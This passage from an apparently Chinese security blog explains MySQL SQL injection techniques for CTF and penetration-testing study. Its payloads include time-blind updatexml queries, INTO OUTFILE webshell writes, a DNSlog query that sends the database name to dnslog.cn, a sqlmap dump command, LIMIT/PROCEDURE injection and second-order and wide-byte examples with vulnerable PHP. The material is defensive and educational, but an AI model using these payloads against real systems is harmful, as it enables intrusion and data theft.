class=\"wp-block-heading\">\u7b1b\u5361\u5c14\u79ef<\/h3>\n\n\n\n<p>\u7b1b\u5361\u5c14\u79ef(\u56e0\u4e3a\u8fde\u63a5\u8868\u662f\u4e00\u4e2a\u5f88\u8017\u65f6\u7684\u64cd\u4f5c)\uff0c\u53ef\u4ee5\u7528<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select count(*) from information_schema.columns A, information_schema.columns B;<\/code><\/pre>\n\n\n\n<p>\u4ee3\u66ffsleep\uff0c\u6539\u6539\u811a\u672c\u5c31\u80fd\u6253ctfshow web219(\u8dd1\u592a\u5feb\u4e86\u503c\u597d\u50cf\u5c31\u4e0d\u5bf9\u4e86\uff0c\u6240\u4ee5\u6211\u52a0\u4e86\u4e2asleep(0.5))\uff0c\u4f46\u8bef\u5dee\u8fd8\u662f\u5f88\u5927\uff0c\u8fd9\u79cd\u65b9\u6cd5\u4e0d\u5efa\u8bae<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">GET_LOCK() \u52a0\u9501<\/h3>\n\n\n\n<p>\u53ef\u4ee5\u770b\u770b<a href=\"https:\/\/xz.aliyun.com\/t\/5505\">SQL\u6ce8\u5165\u6709\u8da3\u59ff\u52bf\u603b\u7ed3<\/a>\uff0c\u9650\u5236\u6709\u70b9\u591a\uff0c\u5f97\u540c\u65f6\u5f00\u4e24\u4e2a<code>SESSION<\/code>\u8fdb\u884c\u6ce8\u5165<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">updatexml<\/h3>\n\n\n\n<p>RCTF2021\u91cc\u6709\u4e00\u9053\u65f6\u95f4\u76f2\u6ce8\u9898\uff0c\u4e00\u9053\u8003\u5bdf\u6bd4\u8d5b\u9009\u624b\u4eec\u5982\u4f55\u5728\u9884\u7f16\u8bd1\u4e2d\u627e\u5230\u8017\u65f6\u51fd\u6570\u7684\u6311\u6218\uff0c\u56e0\u4e3aMySQL\u4e2d\u4f1a\u5bf9\u9700\u8981\u6267\u884c\u7684SQL\u8bed\u53e5\u8fdb\u884c\u9884\u5904\u7406\u6765\u4f18\u5316\u4e00\u4e9b\u65e0\u7528\u7684\u8bed\u53e5\u6216\u8005\u786e\u5b9a\u7c7b\u578b\u3002\u5f53\u5e74\u90a3\u9053\u9898\u53ea\u6709\u4e24\u89e3\uff0c\u5206\u522b\u662fNul1\u548c\u6e05\u534eRedbud\uff0c\u4ed6\u4eec\u6700\u7ec8\u90fd\u4f7f\u7528\u4e86updatexml\u4f5c\u4e3a\u4ea7\u751f\u5ef6\u65f6\u7684\u51fd\u6570\uff0c\u6211\u4eec\u6765\u6b23\u8d4f\u4e00\u4e0b\u4ed6\u4eec\u7684payload\uff1a<\/p>\n\n\n\n<p><strong>From Nu1l<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT\n    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG \nWHERE\n    '\ud83c\udf6c\u5173\u6ce8\u5609\u7136\ud83c\udf6c' = '\ud83c\udf6c\u987f\u987f\u89e3\u998b\ud83c\udf6c' OR '\ud83c\udf6cWatch Diana a day\ud83c\udf6c' = '\ud83c\udf6cKeep hunger away\ud83c\udf6c' OR '\ud83c\udf6c\u5609\u7136\u306b\u6ce8\u76ee\u3057\u3066\ud83c\udf6c' = '\ud83c\udf6c\u98df\u6b32\u3092\u305d\u305d\u308b\ud83c\udf6c' \nORDER BY\n(\n    updatexml (1,\n        IF(\n            ASCII(SUBSTR((SELECT USER()), 1, 1 )) = 65,\n            CONCAT(REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('a', 40000000), REPEAT('b', 10000000)),\n            1\n        ),\n        1\n    ) \n)\n<\/code><\/pre>\n\n\n\n<p>\u5f53\u65f6\u6bd4\u8d5b\u7684\u65f6\u5019\u51fa\u9898\u4eba\u4f7f\u7528\u4e86<code>msleep<\/code>\u5ef6\u957f\u4e86\u6bcf\u6b21\u8bf7\u6c42\u7684\u65f6\u95f4\uff0c\u9700\u8981\u9009\u624b\u627e\u5230\u8017\u65f6\u66f4\u957f\uff08\u80fd\u591f\u7a33\u5b9a\u5ef6\u8fdf1.5\u79d2\u4ee5\u4e0a\uff09\u7684\u653b\u51fbpayload\u4e86\uff0c\u6765\u83b7\u53d6flag\uff0cNu1l\u8fd9\u4e2a\u89e3\u6cd5\u5b9e\u9645\u4e0a\u53ea\u80fd\u9020\u62100.5s-0.7s\u7684\u5ef6\u8fdf\uff0c\u4f46\u4ed6\u4eec\u7528\u4e86\u4e00\u4e2a\u522b\u51fa\u5fc3\u88c1\u7684\u505a\u6cd5\u589e\u5927\u4e86\u5ef6\u65f6\u2014\u2014\u540c\u65f6\u53d1\u5927\u91cf\u8bf7\u6c42\u7684\u5bfc\u81f4\u5927\u4e8e1\u79d2\u7684\u5ef6\u8fdf\u3002<\/p>\n\n\n\n<p><strong>From Redbud<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT\n    CONCAT( 'RCTF{', USER (), '}' ) AS FLAG \nWHERE\n    '\ud83c\udf6c\u5173\u6ce8\u5609\u7136\ud83c\udf6c' = '\ud83c\udf6c\u987f\u987f\u89e3\u998b\ud83c\udf6c' OR '\ud83c\udf6cWatch Diana a day\ud83c\udf6c' = '\ud83c\udf6cKeep hunger away\ud83c\udf6c' OR '\ud83c\udf6c\u5609\u7136\u306b\u6ce8\u76ee\u3057\u3066\ud83c\udf6c' = '\ud83c\udf6c\u98df\u6b32\u3092\u305d\u305d\u308b\ud83c\udf6c' \nORDER BY\n(\n    updatexml (1,\n        concat(\n            '~',\n            (\n                if(\n                    (substr(hex(user()), 1, 1)='A'),\n                    (select length(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex(hex('1')))))))))))))))))))))))))))))))),\n                    'a'\n                )\n            ),\n            1\n        ),\n        1\n    )<\/code><\/pre>\n\n\n\n<p>\u5177\u4f53\u7684\u5206\u6790\u53ef\u4ee5\u770b\u770b\u5f53\u5e74\u7684\u5b98\u65b9WP\uff1a<a href=\"https:\/\/blog.rois.io\/2021\/rctf-2021-official-writeup-2\/#EasySQLi\">RCTF 2021 Official Writeup<\/a><\/p>\n\n\n\n<h1 class=\"wp-block-heading\">sql\u6ce8\u5165getshell<\/h1>\n\n\n\n<p><strong>\u524d\u63d0\uff1a<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5b58\u5728SQL\u6ce8\u5165\u6f0f\u6d1e<\/li>\n\n\n\n<li>web\u76ee\u5f55\u5177\u6709\u5199\u5165\u6743\u9650<\/li>\n\n\n\n<li>\u627e\u5230\u7f51\u7ad9\u7684\u7edd\u5bf9\u8def\u5f84<\/li>\n\n\n\n<li>secure_file_priv\u6ca1\u6709\u5177\u4f53\u503c\uff08secure_file_priv\u662f\u7528\u6765\u9650\u5236load dumpfile\u3001into outfile\u3001load_file()\u51fd\u6570\u5728\u54ea\u4e2a\u76ee\u5f55\u4e0b\u62e5\u6709\u4e0a\u4f20\u548c\u8bfb\u53d6\u6587\u4ef6\u7684\u6743\u9650\u3002\uff09<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">union select\u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=@ union select 1,2,3,4,'&lt;?php phpinfo() ?&gt;' into outfile 'C:\/wamp64\/www\/work\/WebShell.php'<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">lines terminated by \u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=1 into outfile 'C:\/wamp64\/www\/work\/Webshell.php' lines terminated by '&lt;?php phpinfo() ?&gt;';<br>\u539f\u7406\uff1a\u901a\u8fc7select\u8bed\u53e5\u67e5\u8be2\u7684\u5185\u5bb9\u5199\u5165\u6587\u4ef6\uff0c\u4e5f\u5c31\u662f&nbsp;1 into outfile 'C:\/wamp64\/www\/work\/webshell.php'&nbsp;\u8fd9\u6837\u5199\u7684\u539f\u56e0\uff0c\u7136\u540e\u5229\u7528&nbsp;lines terminated by&nbsp;\u8bed\u53e5\u62fc\u63a5webshell\u7684\u5185\u5bb9\u3002lines terminated by&nbsp;\u53ef\u4ee5\u7406\u89e3\u4e3a&nbsp;\u4ee5\u6bcf\u884c\u7ec8\u6b62\u7684\u4f4d\u7f6e\u6dfb\u52a0 xx \u5185\u5bb9\u3002<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">lines starting by \u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=1 into outfile 'C:\/wamp64\/www\/work\/webshell.php' lines starting by '&lt;?php phpinfo() ?&gt;';<br>#\u539f\u7406\uff1a\u5229\u7528&nbsp;lines starting by&nbsp;\u8bed\u53e5\u62fc\u63a5webshell\u7684\u5185\u5bb9\u3002lines starting by&nbsp;\u53ef\u4ee5\u7406\u89e3\u4e3a&nbsp;\u4ee5\u6bcf\u884c\u5f00\u59cb\u7684\u4f4d\u7f6e\u6dfb\u52a0 xx \u5185\u5bb9\u3002<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">fields terminated by \u5199\u5165<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/172.16.55.130\/work\/sqli-1.php?id=1 into outfile 'C:\/wamp64\/www\/work\/webshell.php' fields terminated by '&lt;?php phpinfo() ?&gt;';\n#\u5229\u7528&nbsp;fields terminated by&nbsp;\u8bed\u53e5\u62fc\u63a5webshell\u7684\u5185\u5bb9\u3002fields terminated by\u53ef\u4ee5\u7406\u89e3\u4e3a\u4ee5\u6bcf\u4e2a\u5b57\u6bb5\u7684\u4f4d\u7f6e\u6dfb\u52a0 xx \u5185\u5bb9\u3002<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">2.\u975e\u5e38\u89c4\u6ce8\u5165<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e2d\u8f6c\u6ce8\u5165<\/h1>\n\n\n\n<p>\u672c\u8d28\u4e0a\u6bd4\u8f83\u4f4e\u80fd\uff0c\u662f\u4e2a\u5077\u61d2\u6280\u5de7\u3002\u5982\u679c\u67d0\u4e2a\u7f51\u7ad9\u7684URL\u6ce8\u5165\u70b9\u662f\u7ecf\u8fc7\u7f16\u7801\u7684\uff0c\u4e0d\u80fd\u76f4\u63a5\u7ed3\u5408sqlmap\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\uff0c\u53ef\u4ee5\u672c\u5730\u642d\u5efa\u4e00\u4e2a\u7f51\u7ad9\uff0c\u5199\u4e00\u4e2aphp\u811a\u672c\u7f16\u7801\u6587\u4ef6\uff0c\u7136\u540e\u5c31\u53ef\u4ee5sqlmap\u4e00\u628a\u68ad\u4e86\u3002<\/p>\n\n\n\n<p>\u6bd4\u5982\u67d0\u4e2a\u7f51\u7ad9\u7684url\u4e3a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>url\/show.php?id=MQo=<\/code><\/pre>\n\n\n\n<p>\u4f60\u53ef\u4ee5\u5728\u672c\u5730\u642d\u4e2a\u7f51\u7ad9\uff0c\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php \n$id = base64_encode($_GET&#91;'id']);\necho file_get_contents(\"url\/show.php?id=$id\");\n\n\n\/\/base64_encode base67\u7f16\u7801\n\/\/file_get_contents \u7f51\u7edc\u8bf7\u6c42\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6837\u7684\u8bdd\u8bbf\u95ee\u672c\u5730\u7f51\u7ad9http:\/\/127.0.0.1\/?id=1\u5c31\u7b49\u4e8e\u8bbf\u95eeurl\/show.php?id=MQo=\uff0c\u8fd9\u6837\u5bf9\u7740\u672c\u5730\u7f51\u7ad9\u5c31\u80fdsqlmap\u4e00\u628a\u68ad\u4e86\uff0c\u5f53\u7136\u4f60\u4e5f\u53ef\u4ee5\u76f4\u63a5\u81ea\u5df1\u5199\u4e2atamper\u811a\u672c\u8fdb\u884c\u653b\u51fb<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Dnslog\u5916\u5e26\u6ce8\u5165<\/h1>\n\n\n\n<p>\u5bf9\u7f51\u7ad9\u7528sqlmap\u8dd1\u76f2\u6ce8\u7684\u8bdd\u6709\u53ef\u80fd\u4f1a\u628aip\u5c01\u6389\uff0c\u8fd9\u65f6\u6211\u4eec\u53ef\u4ee5\u8003\u8651\u628a\u6570\u636e\u5916\u5e26\u5230dnslog\u4e0a\u901a\u8fc7\u65e5\u5fd7\u8bfb\u56de\u663e\uff0c\u8fd9\u6837\u4e5f\u7b97\u53d8\u76f8\u4ee3\u7406\u6c60\u4e86\uff0c\u4e0d\u8fc7\u8fd9\u79cd\u65b9\u6cd5\u9700\u8981\u4f7f\u7528Load_file\u51fd\u6570\uff0c\u8fd9\u4e2a\u51fd\u6570\u7684\u4f5c\u7528\u662f\u8bfb\u53d6\u6587\u4ef6\u5e76\u8fd4\u56de\u6587\u4ef6\u5185\u5bb9\u4e3a\u5b57\u7b26\u4e32\uff0c\u8bbf\u95ee\u4e92\u8054\u7f51\u4e2d\u7684\u6587\u4ef6\u65f6\uff0c\u9700\u8981\u5728\u6700\u524d\u9762\u52a0\u4e0a\u4e24\u4e2a\u659c\u6760 \/\/\uff0c\u6709\u51e0\u4e2a\u5229\u7528\u7684\u6761\u4ef6\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u9996\u5148\u8981\u6709\u6ce8\u5165\u70b9<\/li>\n\n\n\n<li>\u9700\u8981\u6709root\u6743\u9650<\/li>\n\n\n\n<li>\u6570\u636e\u5e93\u6709\u8bfb\u5199\u6743\u9650\u5373\uff1asecure_file_priv=\u201c\u201d<\/li>\n\n\n\n<li>\u5f97\u6709\u8bf7\u6c42url\u6743\u9650<\/li>\n\n\n\n<li>\u8fd8\u5fc5\u987b\u5f97\u662fwindows\u670d\u52a1\u5668<\/li>\n<\/ul>\n\n\n\n<p>\u6bd4\u5982\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select load_file(concat('\/\/',(select database()),'.je5i3a.dnslog.cn\/1.txt'));<\/code><\/pre>\n\n\n\n<p><code>concat<\/code>\u51fd\u6570\uff0c\u5c06\u6267\u884c\u7684sql\u8bed\u53e5,\u4e0eDNS\u8bf7\u6c42\u7684url\u8fdb\u884c\u62fc\u63a5\uff0c\u6700\u540e\u5077\u4e2a\u522b\u4eba\u7684\u56fe\u770b\u770b\u7ed3\u679c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-26-1024x274.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"274\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-26-1024x274.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1495\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">\u4f2a\u9759\u6001\u6ce8\u5165<\/h1>\n\n\n\n<p>\u8fd9\u79cd\u6ce8\u5165\u5728\u73b0\u5b9e\u4e2d\u7ecf\u5e38\u51fa\u73b0\uff0c\u6211\u6709\u4e00\u6b21\u5728\u68a6\u91cc\u8fdb\u884c\u6e17\u900f\u6d4b\u8bd5\u7684\u65f6\u5019\u5c31\u9047\u5230\u4e86\u4e00\u4e2aurl\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>xxx\/info\/123324423235435<\/code><\/pre>\n\n\n\n<p>\u800cinfo\u540e\u9762\u8fd9\u4e2a\u6570\u5b57\u5176\u5b9e\u662f\u53ef\u4ee5sql\u6ce8\u5165\uff0c\u5229\u7528sqlmap\u4e5f\u80fd\u8dd1\u51fa\u6765\uff0c\u539f\u56e0\u90a3\u91cc\u7684\u6e90\u7801\u5176\u5b9e\u662f\u4e00\u4e2a\u63a5\u53e3\uff0c\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Route::get('\/info\/{id}')<\/code><\/pre>\n\n\n\n<p>\u8def\u7531\u622a\u53d6id\u503c\u540e\u4f1a\u76f4\u63a5\u628a\u503c\u4f20\u5230\u63a7\u5236\u5668\u51fd\u6570\uff0c\u56e0\u6b64\u5bfc\u81f4sql\u6ce8\u5165\u7684\u4ea7\u751f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ip_data=DB::select(\"select * from cloud_ip where id=$id\");<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u6211\u4eec\u5e73\u65f6\u6d4b\u8bd5sql\u7684\u65f6\u5019\u4e0d\u8981\u53ea\u5173\u6ce8?id=1\u8fd9\u79cdurl\uff0c\u4e5f\u8981\u5173\u6ce8\/info\/1332\u8fd9\u6837\u7684\u8def\u5f84\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">HTTP\u8bf7\u6c42\u5934\u6ce8\u5165<\/h1>\n\n\n\n<p>\u8fd9\u79cd\u6f0f\u6d1e\u4ea7\u751f\u539f\u56e0\u5176\u5b9e\u90fd\u86ee\u76f8\u4f3c\uff0c\u548c\u6b63\u5e38\u7684sql\u6ce8\u5165\u4e5f\u5dee\u4e0d\u591a\uff0c\u4e5f\u5c31\u662fsql\u8bed\u53e5\u7684\u67e5\u8be2\u4e5f\u7528\u4e86http\u8bf7\u6c42\u5934\u7684\u53c2\u6570\uff0c\u6bd4\u5982User-Agent\u3001cookie\u3001X-Forwarded-For\u3001Rerferer\u7b49\u7b49\uff0c\u53ea\u8981\u6d4b\u8bd5\u7684\u65f6\u5019\u6ce8\u610f\u4e00\u4e0b\u4e5f\u6d4b\u8bd5\u8fd9\u51e0\u4e2a\u70b9\u5373\u53ef\uff0c\u6216\u8005sqlmap\u4e00\u628a\u68ad\u7684\u65f6\u5019\u52a0\u4e0aLevel 5\uff0c\u76f4\u63a5\u5c31\u5e2e\u6211\u4eec\u628a\u8fd9\u4e9b\u70b9\u90fd\u6d4b\u8bd5\u5b8c\u4e86\u3002<\/p>\n\n\n\n<p>\u4e3e\u4e2a\u4f8b\u5b50\uff0c\u67d0\u5ddd\u6e1d\u5927\u5b66\u751f\u4fe1\u5b89\u7ade\u8d5b\u53ea\u6709\u4e00\u4e24\u89e3\u7684sql\u9898\uff0c\u5b83\u6f0f\u6d1e\u4ea7\u751f\u7684\u539f\u56e0\u53ef\u80fd\u662f\u56e0\u4e3a\u540e\u53f0\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sq1=\"SELECT * FROM users WHERE username=$session_id LIMIT 0,1\";<\/code><\/pre>\n\n\n\n<p>\u8fd9\u6837\u6f0f\u6d1e\u7684\u4ea7\u751f\u70b9\u5c31\u5f88\u660e\u663e\u4e86\uff0c\u628a\u4e4b\u524d\u7528\u4e8eunion\u6ce8\u5165\u7684payload\u7528\u5728session_id\u4e0a\u5373\u53ef\uff0c\u6211\u4eec\u7528&#8211;data=&#8221;session_id=t6kvde8irh72fjte5sjdddjna0&#8243;\u7ed9sqlmap\u6307\u660e\u6ce8\u5165\u70b9\uff0c\u7136\u540e\u4e00\u628a\u68ad\u5373\u53ef\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sqlmap -u \"http:\/\/f47b450586d37024.node.nsctf.cn\/index.php\" --data \"session_id=t6kvde8irh72fjte5sjdddjna0\" -D level1 -T secrets -C secret --dump secret<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">limit\u6ce8\u5165<\/h1>\n\n\n\n<p>\u6709\u65f6\u5019\u9047\u5230\u7684sql\u8bed\u53e5\u6bd4\u8f83\u82db\u523b\uff0c\u53ef\u63a7\u70b9\u53ea\u6709limit\u540e\u9762\uff1aselect * from limit test limit 1,[\u53ef\u63a7\u70b9] or select \u2026 limit [\u53ef\u63a7\u70b9]\uff0climit\u540e\u9762\u80fd\u591f\u62fc\u63a5\u7684\u51fd\u6570\u53ea\u6709into\u548cprocedure\uff0cinto\u53ef\u4ee5\u7528\u6765\u5199\u6587\u4ef6\uff0c\u8fd9\u91cc\u6211\u4eec\u5148\u4e0d\u8003\u8651\uff0c\u56e0\u4e3a\u5199\u6587\u4ef6\u7684\u6761\u4ef6\u6bd4\u8f83\u82db\u523b\u3002<\/p>\n\n\n\n<p>\u5728Limit\u540e\u9762\uff0c\u6211\u4eec\u8fd8\u53ef\u4ee5\u7528 procedure analyse()\u8fd9\u4e2a\u5b50\u67e5\u8be2\uff0c\u800c\u4e14\u53ea\u80fd\u7528extractvalue \u548c benchmark \u51fd\u6570\u8fdb\u884c\u5ef6\u65f6\uff0c\u4e0d\u8fc7\u8fd9\u79cd\u8bed\u6cd5\u662f\u6709\u524d\u63d0\u6761\u4ef6\u7684\uff0c\u5c31\u662f<strong>5.0.0&lt; MySQL &lt;5.6.6\u7248\u672c<\/strong>\uff0c\u6240\u4ee5\u8fd9\u662f\u4e00\u79cd\u4f4e\u7248\u672c\u6709\u6548\u7684\u6ce8\u5165\u65b9\u6cd5\u3002<\/p>\n\n\n\n<p>\u5728\u5f00\u542f\u4e86\u62a5\u9519\u7684\u65f6\u5019\u6211\u4eec\u53ef\u4ee5\u76f4\u63a5\u62a5\u9519\u6ce8\u5165\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select id from test where id &gt;0 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-28-1024x696.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"696\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-28-1024x696.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1510\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5982\u679c\u6211\u4eec\u6ca1\u6709\u5f00\u542f\u62a5\u9519\u5c31\u53ea\u80fd\u65f6\u95f4\u76f2\u6ce8\u4e86\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select id from test where id &gt;0 order by id limit 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)<\/code><\/pre>\n\n\n\n<p>BENCHMARK(5000000,SHA1(1))\u7b49\u6548\u4e3asleep()\uff0c\u4e4b\u524d\u5df2\u7ecf\u8bb2\u8fc7\u4e86\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u4e8c\u6b21\u6ce8\u5165<\/h1>\n\n\n\n<p>\u9020\u6210\u4e8c\u6b21\u6ce8\u5165\u7684\u672c\u8d28\uff0c\u8fd8\u662f\u56e0\u4e3a\u5bf9\u8f93\u5165\u6ca1\u6709\u505a\u8db3\u591f\u7684\u9650\u5236\uff0c\u5bfc\u81f4\u867d\u7136\u5bf9\u653b\u51fb\u8005\u6709\u4e00\u5b9a\u7684\u963b\u788d\uff0c\u4f46\u7ed5\u4e00\u4e2a\u5708\u8fc7\u53bb\u8fd8\u662f\u80fd\u8fbe\u5230\u76ee\u7684\uff0c\u4ee5Sqli-Labs Less24\u4e3a\u4f8b\uff0c\u5b83\u540e\u7aef\u4fee\u6539\u5bc6\u7801\u7684\u6e90\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$sql = \"UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'\"<\/code><\/pre>\n\n\n\n<p>\u5047\u5982\u6211\u4eec\u6ce8\u518c\u4e86\u4e00\u4e2a\u8d26\u53f7\uff0c\u8d26\u53f7\u540d\u4e3aadmin\u2019#\uff0c\u6211\u4eec\u60f3\u628a\u5b83\u7684\u5bc6\u7801\u4fee\u6539\u4e3a1234567\uff0c\u5219\u540e\u7aef\u6267\u884c\u7684sql\u8bed\u53e5\u5c31\u662f\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>UPDATE users SET PASSWORD='1234567' where username='admin\u2019#' and password='$curr_pass'<\/code><\/pre>\n\n\n\n<p>\u7b49\u4ef7\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>UPDATE users SET PASSWORD='1234567' where username='admin\u2019<\/code><\/pre>\n\n\n\n<p>\u6240\u4ee5\u76f4\u63a5\u628aadmin\u7684\u5bc6\u7801\u4fee\u6539\u4e3a1234567\u4e86\u3002<\/p>\n\n\n\n<p>\u7ea2\u5ca9\u676f\u6709\u4e2asql\u9898\u66b4\u8e81\u8001\u54e5\u7684\u4f5c\u4e1a\u7cfb\u7edf\u4e5f\u662f\u5982\u6b64\uff0c\u5f53\u7136\u90a3\u4e2a\u9898\u8fd8\u8981\u9ad8\u7ea7\u4e00\u70b9\uff0c\u5b83\u4e0d\u4f46\u662f\u4e8c\u6b21\u6ce8\u5165\uff0c\u8fd8\u662f\u6587\u4ef6\u540d\u6ce8\u5165\uff0c\u901a\u8fc7\u4e0a\u4f20\u4e00\u4e2a\u540d\u53eb&#8217; and 1=2 union select xxx from xxx where &#8216;.doc&#8217;=&#8217;.doc\u7684\u6587\u4ef6\uff0c\u7136\u540e\u8bbf\u95ee\u8be5\u6587\u4ef6\uff0c\u6700\u540e\u7684sql\u8bed\u53e5\u5c31\u4f1a\u4ea7\u751f\u95ed\u5408\uff0c\u7c7b\u4f3c\u4e8e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select '1' and 1=2 union select xxx from xxx where '.doc' = '.doc'<\/code><\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">\u7f16\u7801\u6ce8\u5165<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">\u5bbd\u5b57\u8282\u6ce8\u5165<\/h2>\n\n\n\n<p>\u4f8b\u5b50\u6458\u6284\u81ea\uff1a<a href=\"https:\/\/xz.aliyun.com\/t\/7169#toc-15\">\u5bf9MYSQL\u6ce8\u5165\u76f8\u5173\u5185\u5bb9\u53ca\u90e8\u5206Trick\u7684\u5f52\u7c7b\u5c0f\u7ed3<\/a><\/p>\n\n\n\n<p>\u5047\u5982\u8fd9\u91cc\u6709\u4e00\u4e2a\u7f51\u7ad9\uff0c\u540e\u53f0\u6e90\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\n$conn = mysqli_connect(\"127.0.0.1:3307\", \"root\", \"root\", \"db\");\nif (!$conn) {\n    die(\"Connection failed: \" . mysqli_connect_error());\n}\n$conn-&gt;query(\"set names 'gbk';\");\n$username = addslashes(@$_POST&#91;'username']);\n$password = addslashes(@$_POST&#91;'password']);\n$sql = \"select * from users where username = '$username' and password='$password';\";\n$rs = mysqli_query($conn,$sql);\necho $sql.'&lt;br&gt;';\nif($rs-&gt;fetch_row()){\n    echo \"success\";\n}else{\n    echo \"fail\";\n}\n?&gt;<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u7684\u5173\u952e\u4ee3\u7801\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$conn-&gt;query(\"set names 'gbk';\");\n$username = addslashes(@$_POST&#91;'username']);\n$password = 